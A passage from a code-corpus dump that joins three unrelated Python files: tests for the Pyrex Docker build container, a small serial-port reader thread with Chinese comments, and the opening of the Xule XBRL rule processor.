self.assertPyrexHostCommand('true', returncode=1)
output = self.assertSubprocess(['docker', 'images', '-q', conf['config']['tag']],
capture=True).decode('utf-8').strip()
self.assertEqual(output, "", msg="Tagged image found!")
def test_pty(self):
self.assertPyrexContainerShellPTY('true')
self.assertPyrexContainerShellPTY('false', returncode=1)
def test_invalid_term(self):
# Tests that an invalid terminal is correctly detected.
bad_term = 'this-is-not-a-valid-term'
env = os.environ.copy()
env['TERM'] = bad_term
output = self.assertPyrexContainerShellPTY('true', env=env).decode('utf-8').strip()
self.assertIn('$TERM has an unrecognized value of "%s"' % bad_term, output)
self.assertPyrexContainerShellPTY('/usr/bin/infocmp %s > /dev/null' %
bad_term, env=env, returncode=1, quiet_init=True)
def test_required_terms(self):
# Tests that a minimum set of terminals are supported
REQUIRED_TERMS = (
'dumb',
'vt100',
'xterm',
'xterm-256color'
)
env = os.environ.copy()
for t in REQUIRED_TERMS:
with self.subTest(term=t):
env['TERM'] = t
output = self.assertPyrexContainerShellPTY(
'echo $TERM', env=env, quiet_init=True).decode('utf-8').strip()
self.assertEqual(output, t, msg='Bad $TERM found in container!')
output = self.assertPyrexContainerShellPTY(
'/usr/bin/infocmp %s > /dev/null' % t, env=env).decode('utf-8').strip()
self.assertNotIn('$TERM has an unrecognized value', output)
def test_tini(self):
self.assertPyrexContainerCommand('tini --version')
def test_guest_image(self):
# This test makes sure that the image being tested is the image we
# actually expect to be testing
# Split out the image name, version, and type
(image_name, image_version, _) = self.test_image.split('-')
# Capture the LSB release information.
dist_id_str = self.assertPyrexContainerCommand(
'lsb_release -i', quiet_init=True, capture=True).decode('utf-8').rstrip()
release_str = self.assertPyrexContainerCommand(
'lsb_release -r', quiet_init=True, capture=True).decode('utf-8').rstrip()
self.assertRegex(dist_id_str.lower(), r'^distributor id:\s+' + re.escape(image_name))
self.assertRegex(release_str.lower(), r'^release:\s+' + re.escape(image_version) + r'(\.|$)')
def test_default_ini_image(self):
# Tests that the default image specified in pyrex.ini is valid
config = configparser.RawConfigParser()
config.read_string(pyrex.read_default_config(True))
self.assertIn(config['config']['dockerimage'], TEST_IMAGES)
def test_envvars(self):
conf = self.get_config()
conf['run']['envvars'] += ' TEST_ENV'
conf.write_conf()
test_string = 'set_by_test.%d' % threading.get_ident()
env = os.environ.copy()
env['TEST_ENV'] = test_string
s = self.assertPyrexContainerShellCommand(
'echo $TEST_ENV', env=env, quiet_init=True, capture=True).decode('utf-8').rstrip()
self.assertEqual(s, test_string)
s = self.assertPyrexContainerShellCommand(
'echo $TEST_ENV2', env=env, quiet_init=True, capture=True).decode('utf-8').rstrip()
self.assertEqual(s, '')
def test_custom_startup_script(self):
conf = self.get_config()
conf['run']['envvars'] += ' PYREX_TEST_STARTUP_SCRIPT'
conf.write_conf()
env = os.environ.copy()
env['PYREX_TEST_STARTUP_SCRIPT'] = "3"
self.assertPyrexContainerShellCommand(
'echo $PYREX_TEST_STARTUP_SCRIPT', env=env, quiet_init=True, returncode=3)
env['PYREX_TEST_STARTUP_SCRIPT'] = "0"
s = self.assertPyrexContainerShellCommand(
'echo $PYREX_TEST_STARTUP_SCRIPT', env=env, quiet_init=True, capture=True).decode('utf-8').rstrip()
self.assertEqual(s, "Startup script test\n0")
class PyrexImageType_oe(PyrexImageType_base):
"""
Tests images designed for building OpenEmbedded
"""
def test_bitbake_parse(self):
self.assertPyrexHostCommand('bitbake -p')
def test_icecc(self):
self.assertPyrexContainerCommand('icecc --version')
def test_templateconf_abs(self):
template_dir = os.path.join(self.thread_dir, 'template')
os.makedirs(template_dir)
self.assertTrue(os.path.isabs(template_dir))
shutil.copyfile(os.path.join(PYREX_ROOT, 'poky/meta-poky/conf/local.conf.sample'),
os.path.join(template_dir, 'local.conf.sample'))
shutil.copyfile(os.path.join(PYREX_ROOT, 'poky/meta-poky/conf/bblayers.conf.sample'),
os.path.join(template_dir, 'bblayers.conf.sample'))
test_string = 'set_by_test.%d' % threading.get_ident()
# Write out a config template that passes along the TEST_ENV variable.
# The variable will only have the correct value in the container if
# the template is used
conf = self.get_config()
conf['run']['envvars'] += ' TEST_ENV'
with open(os.path.join(template_dir, 'pyrex.ini.sample'), 'w') as f:
conf.write(f)
# Delete the normal pyrex conf file so a new one will be pulled from
# TEMPLATECONF
os.unlink(self.pyrex_conf)
env = os.environ.copy()
env['TEMPLATECONF'] = template_dir
env['TEST_ENV'] = test_string
s = self.assertPyrexContainerShellCommand(
'echo $TEST_ENV', env=env, quiet_init=True, capture=True).decode('utf-8').rstrip()
self.assertEqual(s, test_string)
def test_templateconf_rel(self):
template_dir = os.path.join(self.thread_dir, 'template')
os.makedirs(template_dir)
self.assertTrue(os.path.isabs(template_dir))
shutil.copyfile(os.path.join(PYREX_ROOT, 'poky/meta-poky/conf/local.conf.sample'),
os.path.join(template_dir, 'local.conf.sample'))
shutil.copyfile(os.path.join(PYREX_ROOT, 'poky/meta-poky/conf/bblayers.conf.sample'),
os.path.join(template_dir, 'bblayers.conf.sample'))
test_string = 'set_by_test.%d' % threading.get_ident()
# Write out a config template that passes along the TEST_ENV variable.
# The variable will only have the correct value in the container if
# the template is used
conf = self.get_config()
conf['run']['envvars'] += ' TEST_ENV'
with open(os.path.join(template_dir, 'pyrex.ini.sample'), 'w') as f:
conf.write(f)
# Delete the normal pyrex conf file so a new one will be pulled from
# TEMPLATECONF
os.unlink(self.pyrex_conf)
env = os.environ.copy()
env['TEMPLATECONF'] = os.path.relpath(template_dir, os.path.join(PYREX_ROOT, 'poky'))
env['TEST_ENV'] = test_string
s = self.assertPyrexContainerShellCommand(
'echo $TEST_ENV', env=env, quiet_init=True, capture=True).decode('utf-8').rstrip()
self.assertEqual(s, test_string)
TEST_IMAGES = ('ubuntu-14.04-base', 'ubuntu-16.04-base', 'ubuntu-18.04-base', 'centos-7-base',
'ubuntu-14.04-oe', 'ubuntu-16.04-oe', 'ubuntu-18.04-oe')
def add_image_tests():
for image in TEST_IMAGES:
(_, _, image_type) = image.split('-')
self = sys.modules[__name__]
parent = getattr(self, 'PyrexImageType_' + image_type)
name = 'PyrexImage_' + re.sub(r'\W', '_', image)
setattr(self, name, type(name, (parent, unittest.TestCase), {'test_image': image}))
add_image_tests()
if __name__ == "__main__":
unittest.main()
|
serial_thread.py | # encoding:UTF-8
import serial # 导入串口包
import time # 导入时间包
import threading
class Config:
# 端口号
serialPort = '/dev/ttyUSB0'
# 波特率
baudRate = 9600
class Serialthread:
def __init__(self):
self.port = serial.Serial(Config.serialPort, Config.baudRate,timeout = 0)
self.port.close()
if not self.port.isOpen():
self.port.open()
self.working = False
self.iniVariable()#初始化变量
#打开
def open(self):
if not self.port.isOpen():
self.port.open()
#关闭
def close(self):
self.port.close()
#初始化解析相关的变量
def iniVariable(self):
self.Rev_data = " "
#发送数据
def send(self, data):
#串口收发的数据是bytes类型,通过encode()将str转变为bytes
self.port.write(data.encode("gbk"))
#接收数据
def receive(self):
while self.working:
#休眠一个微小的时间,可以避免无谓的CPU占用
time.sleep(0.001)
if self.port.in_waiting > 0 :
#串口收发的数据是bytes类型,通过decode()将bytes转变为str
self.Rev_data = self.port.readline().decode("gbk")
#开始工作
def start(self):
#开始数据读取线程
t = threading.Thread(target=self.receive)
#将当前线程设为子线程t的守护线程,这样一来,当前线程结束时会强制子线程结束
t.setDaemon(True)
self.working = True
t.start()
#停止工作
def stop(self):
self.working = False
#如果本文件被引用则面函数不被执行
if __name__=="__main__":
s = Serialthread()
s.start()
while True:
time.sleep(1)
s.send(s.Rev_data)
print(s.Rev_data)
|
XuleProcessor.py | """XuleProcessor
Xule is a rule processor for XBRL (X)brl r(ULE).
The XuleProcessor module is the main module for processing a rule set against an instance.
DOCSKIP
See https://xbrl.us/dqc-license for license information.
See https://xbrl.us/dqc-patent for patent infringement notice.
Copyright (c) 2017 - 2019 XBRL US, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
$Change: 23074 $
DOCSKIP
"""
from .XuleContext import XuleGlobalContext, XuleRuleContext # XuleContext
from .XuleRunTime import XuleProcessingError, XuleIterationStop, XuleException, XuleBuildTableError, XuleReEvaluate
from .XuleValue import *
from . import XuleConstants as xc
from . import XuleUtility
import itertools as it
from arelle.ModelValue import QName, dayTimeDuration, DateTime, gYear, gMonthDay, gYearMonth, qname
from arelle.ModelInstanceObject import ModelFact
from arelle.ModelRelationshipSet import ModelRelationshipSet
from arelle.ModelDtsObject import ModelConcept
from arelle.ModelObject import ModelObject
import decimal
import datetime
import math
import re
from aniso8601 import parse_duration, parse_datetime, parse_date
import collections
import copy
from threading import Thread
from . import XuleFunctions
from . import XuleProperties
import os
def process_xule(rule_set, model_xbrl, cntlr, options, saved_taxonomies=None):
"""Run xule rules against a filing.
:param rule_set: An opened rule set
:type rule_set: XuleRuleSet
:param model_xbrl: An Arelle model of the instance document
:type model_xbrl: ModelXbrl
:param cntlr: An Arelle controller
:type cntlr: Cntlr
:param options: The command line options
:type options: optparse
This is the main function to process a Xule ruleset against a filing. This function just sets a few things up.
The most import item is the processor context. The context saves the state of the processor throughout the
processing of the rules.
"""
global_context = XuleGlobalContext(rule_set, model_xbrl, cntlr, options)
if saved_taxonomies is not None and len(saved_taxonomies) > 0:
global_context.other_taxonomies = saved_taxonomies
# Set up trace files
if getattr(global_context.options, "xule_trace_count", False):
try:
os.remove(global_context.options.xule_trace_count + ".csv")
except FileNotFoundError:
pass
try:
os.remove(global_context.options.xule_trace_count + ".txt")
except FileNotFoundError:
pass
if getattr(global_context.options, "xule_time", None) is not None:
total_start = datetime.datetime.today()
if getattr(global_context.options, "xule_multi", False):
from .XuleMultiProcessing import output_message_queue
t = Thread(target=output_message_queue, args=(global_context,))
t.name = "Message Queue"
t.start()
if getattr(global_context.options, "xule_time", None) is not None:
fact_index_start = datetime.datetime.today()
# Create the processing context to build the index
xule_context = XuleRuleContext(global_context)
# Build an index on the facts in the model.
index_model(xule_context)
# Clean up
del xule_context
if getattr(global_context.options, "xule_time", None) is not None:
fact_index_end = datetime.datetime.today()
global_context.message_queue.print("Index build time %s." % (fact_index_end - fact_index_start))
# Determine is constants should be precalced. This is determined by the --xule-precalc-constants optoin on the command line. This is useful to simulate how the processor works in the server
# environment.
if getattr(global_context.options, "xule_precalc_constants", False):
constant_start = datetime.datetime.today()
process_precalc_constants(global_context)
constant_end = datetime.datetime.today()
constant_time = constant_end - constant_start
global_context.message_queue.print("Time to calculated non instance constants: %s" % (constant_time))
# global_context.message_queue.logging("Processing Filing...")
evaluate_rule_set(global_context)
if getattr(global_context.options, "xule_time", None) is not None:
total_end = datetime.datetime.today()
if getattr(global_context.options, "xule_precalc_constants", False):
global_context.message_queue.print(
"Time to process excluding non instance constant: %s." % (total_end - total_start - constant_time))
global_context.message_queue.print("Total time to process: %s." % (total_end - total_start))
# Shutdown Message Queue
if getattr(global_context.options, "xule_multi", False):
global_context.message_queue.stop()
global_context.message_queue.clear()
t.join()
# Save any taxonomies that were opened
saved_taxonomies = global_context.other_taxonomies
# clean up
del global_context
return saved_taxonomies
def evaluate_rule_set(global_context):
"""Process the rule set.
:param global_context: The global processing context
:type global_context: XuleGlobalContext
:param skip_rules: A list of rule names to skip
:type skip_rules: list
This function loops through all the rules in the rule set and evaluates each rule.
During evaluation of a rule, the evaluator can produce a XuleIterationStop exception. This exception indicates
that processing of the current iteration of the rule can stop and go to the next iteration.
"""
if getattr(global_context.options, "xule_time", None) is not None:
times = []
# Create a list of rules to skip. These are determined by the --xule-skip option on the command line.
skip_rules = getattr(global_context.options, "xule_skip", None).split(",") if getattr(global_context.options,
"xule_skip",
None) is not None else None
# Create a list of run only rules. This is the opposite of skip_rules. If run_only is not NOne than only those rules will be processed.
run_only_rules = getattr(global_context.options, "xule_run_only", None).split(",") if getattr(
global_context.options, "xule_run_only", None) is not None else None
# use the term "cat" for catalog information. Read through the list of rules in the catalog.
for file_num, cat_rules in global_context.catalog['rules_by_file'].items():
for rule_name in sorted(cat_rules.keys()):
cat_rule = cat_rules[rule_name]
if skip_rules is not None and rule_name in skip_rules:
global_context.message_queue.print("Skipping rule: %s" % rule_name)
continue
if not (run_only_rules is None or rule_name in run_only_rules):
continue
# get the AST for the rule from the ruleset
rule = global_context.rule_set.getItem(cat_rule)
if getattr(global_context.options, "xule_debug", False):
global_context.message_queue.print(
"Processing: %s - %s" % (rule_name, datetime.datetime.today().strftime("%H:%M:%S.%f")))
if global_context.model is not None:
global_context.message_queue.print(global_context.model.modelDocument.uri)
try:
if getattr(global_context.options, "xule_time", None) is not None or getattr(global_context.options,
"xule_trace_count", False):
rule_start = datetime.datetime.today()
# Establish the rule context. A new context is created for each rule.
xule_context = XuleRuleContext(global_context,
rule_name,
file_num)
# add the main table
xule_context.iteration_table.add_table(rule['node_id'], xule_context.get_processing_id(rule['node_id']))
# Evaluate the rule.
if global_context.model is not None:
global_context.model.modelManager.showStatus("Processing rule {}".format(rule_name))
evaluate(rule, xule_context)
except (XuleProcessingError, XuleBuildTableError) as e:
if getattr(global_context.options, "xule_crash", False):
raise
else:
xule_context.global_context.message_queue.error("xule:error", str(e))
except XuleIterationStop:
pass
except Exception as e:
if getattr(global_context.options, "xule_crash", False):
# if global_context.crash_on_error:
raise
else:
xule_context.global_context.message_queue.error("xule:error", "rule %s: %s" % (rule_name, str(e)))
if getattr(global_context.options, "xule_time", None) is not None:
rule_end = datetime.datetime.today()
times.append((xule_context.rule_name, rule_end - rule_start))
if getattr(global_context.options, "xule_debug", False):
global_context.message_queue.print("%s time took: %s - %s " % (
rule_name, (rule_end - rule_start).total_seconds(),
datetime.datetime.today().strftime("%H:%M:%S.%f")))
if getattr(global_context.options, "xule_trace_count", False):
total_time = datetime.datetime.today() - rule_start
print("Total iterations:", xule_context.iter_count,
"Messages:", xule_context.iter_message_count,
"Pass:", xule_context.iter_pass_count,
"Non alignment:", xule_context.iter_misaligned_count,
"Exception:", xule_context.iter_except_count)
write_trace_count_csv(global_context.options.xule_trace_count, rule_name,
global_context.expression_trace, rule, xule_context.iter_count, total_time)
write_trace_count_string(global_context.options.xule_trace_count, rule_name,
global_context.expression_trace, rule, xule_context.iter_count, total_time)
# clean up
del xule_context
# Display timing information
if getattr(global_context.options, "xule_time", None) is not None:
global_context.message_queue.print("Total number of rules processed: %i" % len(times))
# slow_rules = [timing_info for timing_info in times if timing_info[1].total_seconds() > 0.001]
slow_rules = sorted([timing_info for timing_info in times if
timing_info[1].total_seconds() > getattr(global_context.options, "xule_time", None)],
key=lambda tup: tup[1], reverse=True)
# slow_rules = [timing_info for timing_info in times if timing_info[1].total_seconds() > global_context.show_timing]
global_context.message_queue.print(
"Number of rules over %ss: %i" % (getattr(global_context.options, "xule_time", None), len(slow_rules)))
for slow_rule in slow_rules:
global_context.message_queue.print("Rule %s end. Took %s" % (slow_rule[0], slow_rule[1]))
# global_context.message_queue.print("Global expression cache size: %i" % len(global_context.expression_cache))
def index_model(xule_context):
"""Index the facts in the Arelle model
:param xule_context: The rule context
:type xule_context: XuleRuleContext
:returns: A dictionary of the facts. The dictionary is keyed by index keys.
:rtype: dict
This fucntion goes through all the facts in the Arelle model and organizes them by potential index keys. The index is used
for factset evaluation. The keys are the aspects of the facts. Additional keys are based on properties of the aspects
(i.e. concept.is-monetary).
"""
fact_index = collections.defaultdict(lambda: collections.defaultdict(set))
facts_to_index = collections.defaultdict(list)
if xule_context.model is not None:
for model_fact in xule_context.model.factsInInstance:
all_aspects = list()
all_aspects.append((('builtin', 'concept'), model_fact.qname))
period = model_to_xule_period(model_fact.context, xule_context)
all_aspects.append((('builtin', 'period'), period))
if model_fact.isNumeric:
unit = model_to_xule_unit(model_fact.unit, xule_context)
all_aspects.append((('builtin', 'unit'), unit))
entity = model_to_xule_entity(model_fact.context, xule_context)
all_aspects.append((('builtin', 'entity'), entity))
for dim, mem in sorted(model_fact.context.qnameDims.items()):
if mem.isExplicit:
all_aspects.append((('explicit_dimension', dim), mem.memberQname))
else:
all_aspects.append((('explicit_dimension', dim), mem.typedMember.xValue))
all_aspects = tuple(all_aspects)
if getattr(xule_context.global_context.options, "xule_include_dups", False):
facts_to_index[all_aspects].append(model_fact)
else:
# Need to eliminate duplicate facts.
# Duplicate facts are facts that have the same aspects and same value (taking accuracy into account for numeric facts). If there are duplicates
# with different values, then the duplicate is not eliminated.
if all_aspects in facts_to_index:
# there is a fact already
found_match = False
for position in range(len(facts_to_index[all_aspects])):
saved_fact = facts_to_index[all_aspects][position]
if model_fact.isNumeric:
saved_value, saved_decimals, cur_value, cur_decimals = get_decimalized_value(saved_fact,
model_fact,
xule_context)
if cur_value == saved_value:
found_match = True
if cur_decimals > saved_decimals:
facts_to_index[all_aspects][position] = model_fact
# otherwise, the saved fact is the better fact to index
else:
# fact is non numeric
if model_fact.xValue == saved_fact.xValue:
found_match = True
if not found_match:
# this is a duplicate with a different value
facts_to_index[all_aspects].append(model_fact)
else:
# First time adding fact
facts_to_index[all_aspects].append(model_fact)
# add the facts to the fact index.
for all_aspects, facts in facts_to_index.items():
for model_fact in facts:
for aspect in all_aspects:
# aspect[0] is the aspect(dimension) name. aspect[1] is the aspect(dimension) value
fact_index[aspect[0]][aspect[1]].add(model_fact)
for property in index_properties(model_fact):
fact_index[property[0]][property[1]].add(model_fact)
# get all the facts
all_facts = {fact for facts in facts_to_index.values() for fact in facts}
# for each aspect add a set of facts that don't have that aspect with a key value of None
for aspect_key in fact_index:
fact_index[aspect_key][None] = all_facts - set(it.chain.from_iterable(fact_index[aspect_key].values()))
# save the list of all facts.
fact_index['all'] = all_facts
# Save the fact index
xule_context.global_context.fact_index = fact_index
# Create table index properties
index_table_properties(xule_context)
# Add the None facts for the table properites. These are the facts that don't have the property.
for aspect_key in fact_index:
if aspect_key != 'all' and None not in fact_index[aspect_key]:
fact_index[aspect_key][None] = all_facts - set(it.chain.from_iterable(fact_index[aspect_key].values()))
def index_properties(model_fact):
"""Calculate the properties for the fact.
:param model_fact: The fact
:type model_value: ModelFact
:returns: A list of properties to add to the fact index. The items of the list are 2 item tuples of property identifier and property value.
:rtype: list
"""
prop_list = list()
for property_key, property_function in _FACT_INDEX_PROPERTIES.items():
property_value = property_function(model_fact)
if property_value is not None:
prop_list.append((property_key, property_value))
for attribute in model_fact.concept.elementAttributesTuple:
# Create an aspect property for the concept aspect for any additional xml attributes that are on the concept.
# attribute[0] is the attribute name. For qnames this will be in clarknotation
# attribute[1] is the attribute value
if attribute[0] not in ('id', 'name', 'substitutionGroup', 'type', '{http://www.xbrl.org/2003/instance}balance',
'{http://www.xbrl.org/2003/instance}periodType'):
prop_list.append((('property', 'concept', 'attribute', qname(attribute[0])), attribute[1]))
return prop_list
def index_property_start(model_fact):
if model_fact.context.isStartEndPeriod:
return model_fact.context.startDatetime
elif model_fact.context.isInstantPeriod:
return model_fact.context.endDatetime - datetime.timedelta(days=1)
def index_property_end(model_fact):
if model_fact.context.isStartEndPeriod:
return model_fact.context.endDatetime - datetime.timedelta(days=1)
elif model_fact.context.isInstantPeriod:
return model_fact.context.endDatetime - datetime.timedelta(days=1)
def index_property_days(model_fact):
if model_fact.context.isStartEndPeriod:
return (model_fact.context.endDatetime - model_fact.context.startDatetime).days
elif model_fact.context.isInstantPeriod:
return 0
def index_property_balance(model_fact):
if model_fact.concept.balance is not None:
return model_fact.concept.balance
# These are aspect properties that are used in a factset. I.e. @concept.is-monetary. The 'is-monetary' is an aspect property of the
# aspect 'concept'. This list identifies all the expected properties that will be in the fact index. This a dictionary with the key
# being the property identifier and the value being the function to calculate the value of the property with a fact. The property identifier
# is a 3 part tuple:
# 1 - 'property' - This part is always 'property'.
# 2 - the aspect name
# 3 - the property name
_FACT_INDEX_PROPERTIES = {
('property', 'concept', 'period-type'): lambda f: f.concept.periodType,
('property', 'concept', 'balance'): index_property_balance,
('property', 'concept', 'data-type'): lambda f: f.concept.typeQname,
('property', 'concept', 'base-type'): lambda f: f.concept.baseXbrliTypeQname,
('property', 'concept', 'is-monetary'): lambda f: f.concept.isMonetary,
('property', 'concept', 'is-numeric'): lambda f: f.concept.isNumeric,
('property', 'concept', 'substitution'): lambda f: f.concept.substitutionGroupQname,
('property', 'concept', 'namespace-uri'): lambda f: f.concept.qname.namespaceURI,
('property', 'concept', 'local-name'): lambda f: f.concept.qname.localName,
('property', 'concept', 'is-abstract'): lambda f: f.concept.isAbstract,
('property', 'concept', 'id'): lambda f: f.id,
('property', 'period', 'start'): index_property_start,
('property', 'period', 'end'): index_property_end,
('property', 'period', 'days'): index_property_days,
('property', 'entity', 'scheme'): lambda f: f.context.entityIdentifier[0], # entityIdentifier[0] is the scheme
('property', 'entity', 'id'): lambda f: f.context.entityIdentifier[1]
# entityIdentifer[1] is the id
}
def index_table_properties(xule_context):
""""Add the table properites to the fact index
:type xule_context: XuleRuleContext
"""
# Go through each table.
for cube_base in XuleDimensionCube.base_dimension_sets(xule_context.model):
cube = XuleDimensionCube(xule_context.model, *cube_base, include_facts=True)
xule_context.global_context.fact_index[('builtin', 'cube')][cube] |= cube.facts
xule_context.global_context.fact_index[('property', 'cube', 'name')][cube.hypercube.qname] |= cube.facts
xule_context.global_context.fact_index[('property', 'cube', 'drs-role')][cube.drs_role.roleURI] |= cube.facts
def get_decimalized_value(fact_a, fact_b, xule_context):
"""Adjust 2 fact values based on accuracy.
:param fact_a: First fact
:type fact_a: ModelFact
:param fact_b: Second fact
:type fact_b: ModelFact
:returns: A tuple of the rounded fact values and the new decimals value for each
:rtype: tuple
Round the fact values to the minimum accuracy defined by the decimals attribute of the facts.
Example:
Fact value of 1,234,567 with decimals -3 is rounded to 1,235,000
Arguments:
fact_a (ModelFact): First fact
fact_b (ModelFact): Second fact
xule_context (XuleRuleContext): Processing context
"""
fact_a_decimals = get_decimals(fact_a, xule_context)
fact_b_decimals = get_decimals(fact_b, xule_context)
min_decimals = min(fact_a_decimals, fact_b_decimals)
fact_a_value = fact_a.xValue if fact_a_decimals == float('inf') else round(fact_a.xValue, min_decimals)
fact_b_value = fact_b.xValue if fact_b_decimals == float('inf') else round(fact_b.xValue, min_decimals)
return fact_a_value, fact_a_decimals, fact_b_value, fact_b_decimals
def get_decimals(fact, xule_context):
"""Return the decimals of a fact as a number.
:param fact: The fact to get the accuracy from
:type fact: ModelFact
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
"""
if fact.decimals is None:
return float('inf')
if fact.decimals.strip() == 'INF':
return float('inf')
else:
try:
return int(fact.decimals)
except ValueError:
raise XuleProcessingError(_("%s Fact contains invalid decimal value of %s" % (fact.qname, fact.decimals)),
xule_context)
def evaluate(rule_part, xule_context, trace_dependent=False, override_table_id=None):
"""General evaluator for an expression.
:param rule_part: The expression being evaluated
:type rule_part: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:param trace_dependent: Debugging indicator
:type trace_dependent: bool
:param override_table_id: A table id to use instead of the table id of the rule_part.
:type override_table_id: int
This is the main evaluator for evlatuating rule expressions. If the rule_part is an iterable expression it will be evaluated. The returned
values will be put on the iteration table and a single value will be selected as the value of the expression for the current iteration. If the
the rule_part is a singleton expression, then it will be evaluated and the value returned.
Each type of expression (i.e. assertion, if statement, for loop, literal interger, add operation) has its own evaluator. This evaluator will call
the appriate evaluator for the expression.
This evaluator handles caching expression evaluations for performance.
This evaluator also includes capturing information about the evaluation for debugging purposes.
"""
try:
# Setup trace information.
if getattr(xule_context.global_context.options, "xule_trace", False) or getattr(
xule_context.global_context.options, "xule_trace_count", False):
trace_is_dependent = "D" if trace_dependent else " "
trace_source = "U"
trace_written = False
if getattr(xule_context.global_context.options, "xule_trace_count", False):
if rule_part['node_id'] not in xule_context.expression_trace:
xule_context.expression_trace[rule_part['node_id']] = {'iterations': 1, # total
'iterations-t': datetime.timedelta(0),
'U': 0,
# unknown iterations - should always be none
'U-t': datetime.timedelta(0),
'E': 0, # evaluated iterables
'E-t': datetime.timedelta(0),
'c': 0, # from cache
'c-t': datetime.timedelta(0),
'T': 0, # from table
'T-t': datetime.timedelta(0),
'e': 0, # evaluate non iterable
'e-t': datetime.timedelta(0),
'R': 0, # re-evaluate
'R-t': datetime.timedelta(0),
'r': 0, # re-evaluate non iterable
'r-t': datetime.timedelta(0),
'isE': 0,
# iteration stop on evaluation of iterable
'isE-t': datetime.timedelta(0),
'ise': 0,
# iteration stop on evaluate of non iterable
'ise-t': datetime.timedelta(0),
'isu': 0,
# iteration stop on unbound during post value processing
'isu-t': datetime.timedelta(0),
'ex': 0, # exception during iteration evaluation
'ex-t': datetime.timedelta(0),
'name': rule_part['exprName']
}
else:
xule_context.expression_trace[rule_part['node_id']]['iterations'] += 1
expression_trace_start = datetime.datetime.today()
#processing_id = xule_context.get_processing_id(rule_part['node_id'])
processing_id = xule_context.get_column_id(rule_part['node_id'])
rule_part_name = rule_part['exprName']
# trace
if getattr(xule_context.global_context.options, "xule_trace", False):
xule_context.trace_level += 1
trace = " " * xule_context.trace_level
trace += rule_part_name + " " + str(processing_id) # + " " + str(rule_part)
print(">", trace_is_dependent, " ", processing_id, trace.replace("\n", " "))
if ('is_iterable' in rule_part):
# is_iterable is always true if it is present, so don't need to check the actual value
xule_context.used_expressions.add(processing_id)
if 'is_dependent' in rule_part:
is_dependent = rule_part['is_dependent']
value = xule_context.iteration_table.current_value(processing_id, xule_context)
if value is None:
# Will evaluate or get from cache.
values = None
if is_dependent:
xule_context.iteration_table.current_table.make_dependent()
try:
if getattr(xule_context.global_context.options, "xule_no_cache", False):
# if xule_context.global_context.no_cache:
values = None
else:
if (rule_part.get('table_id') != xule_context.iteration_table.main_table_id or
is_dependent):
local_cache_key = get_local_cache_key(rule_part, xule_context)
if local_cache_key is not None:
values = xule_context.local_cache.get(local_cache_key)
else:
values = None
if values is None:
values = EVALUATOR[rule_part_name](rule_part, xule_context)
trace_source = "E"
if not getattr(xule_context.global_context.options, "xule_no_cache", False):
# if not xule_context.global_context.no_cache:
if (rule_part.get('table_id') != xule_context.iteration_table.main_table_id or
is_dependent):
local_cache_key = get_local_cache_key(rule_part, xule_context)
if local_cache_key is not None:
# print("caching", rule_part['node_id'], [(x[0], x[1].format_value()[:10]) for x in local_cache_key[1]], len(values.values))
xule_context.local_cache[local_cache_key] = values
else:
# print("using cache", rule_part['node_id'], [x[0] for x in local_cache_key[1]])
trace_source = "c"
except XuleIterationStop:
if getattr(xule_context.global_context.options, "xule_trace", False):
# if xule_context.show_trace:
xule_context.trace_level -= 1
if getattr(xule_context.global_context.options, "xule_trace_count", False):
# if xule_context.show_trace_count:
xule_context.expression_trace[rule_part['node_id']][
'iterations-t'] += datetime.datetime.today() - expression_trace_start
xule_context.expression_trace[rule_part['node_id']][
'isE-t'] += datetime.datetime.today() - expression_trace_start
xule_context.expression_trace[rule_part['node_id']]['isE'] += 1
trace_written = True
raise
except XuleReEvaluate:
trace_source = 'R'
raise
else:
# add - add values to expression cache
xule_context.iteration_table.add_column(rule_part, override_table_id or rule_part['table_id'],
processing_id, values, xule_context)
value = xule_context.iteration_table.current_value(processing_id, xule_context)
# The tags on the value may not apply to this iteration. For exmaple, if the expression is not dependent, then it will
# be evaluated once and stored in the local cache with the tags from the first evaluation.
if value is not None and value.tags is not None:
new_tags = value.tags.copy()
new_tags.update(xule_context.tags)
value.tags = new_tags
else:
trace_source = "T"
else:
raise XuleProcessingError(
_("Internal error: Found iterable (%s) that does not have a dependency flag." % rule_part_name),
xule_context)
else: # is_iterable
trace_source = "e"
# Check the cache - only if the expression does have something in it that produces multiple results and its not a varRef.
if getattr(xule_context.global_context.options, "xule_no_cache", False):
local_cache_key = None
else:
if rule_part['number'] == 'single' and rule_part['exprName'] not in ('varRef', 'tagRef'):
local_cache_key = get_local_cache_key(rule_part, xule_context)
else:
local_cache_key = None
if local_cache_key is None:
value = None
else:
cache_value = xule_context.local_cache.get(local_cache_key)
value = cache_value.clone() if cache_value is not None else None
# The tags on the value may not apply to this iteration. For exmaple, if the expression is not dependent, then it will
# be evaluated once and stored in the local cache with the tags from the first evaluation.
if value is not None and value.tags is not None:
new_tags = value.tags.copy()
new_tags.update(xule_context.tags)
value.tags = new_tags
if value is None:
try:
value = EVALUATOR[rule_part_name](rule_part, xule_context)
except XuleIterationStop:
if getattr(xule_context.global_context.options, "xule_trace", False):
# if xule_context.show_trace:
xule_context.trace_level -= 1
if getattr(xule_context.global_context.options, "xule_trace_count", False):
# if xule_context.show_trace_count:
xule_context.expression_trace[rule_part['node_id']][
'iterations-t'] += datetime.datetime.today() - expression_trace_start
xule_context.expression_trace[rule_part['node_id']][
'ise-t'] += datetime.datetime.today() - expression_trace_start
xule_context.expression_trace[rule_part['node_id']]['ise'] += 1
trace_written = True
raise
except XuleReEvaluate as e:
trace_source = 'r'
raise
if not getattr(xule_context.global_context.options, "xule_no_cache", False):
if local_cache_key is not None:
# The cache value is cloned so it is not corrupted by further processing after this point.
xule_context.local_cache[local_cache_key] = value.clone() if value is not None else value
# If the look_for_alignment flag is set, check if there is now alignment after adding the column. This is used in 'where' clause processing.
if (xule_context.look_for_alignment and
# rule_part.has_alignment and
value.aligned_result_only and
rule_part.get('table_id') in xule_context.where_table_ids and
rule_part['node_id'] in xule_context.where_dependent_iterables):
raise XuleReEvaluate(xule_context.iteration_table.any_alignment)
if getattr(xule_context.global_context.options, "xule_trace", False):
# if xule_context.show_trace:
sugar = sugar_trace(value, rule_part, xule_context)
trace_info = (xule_context.trace_level, rule_part_name, sugar, value)
xule_context.trace.appendleft(trace_info)
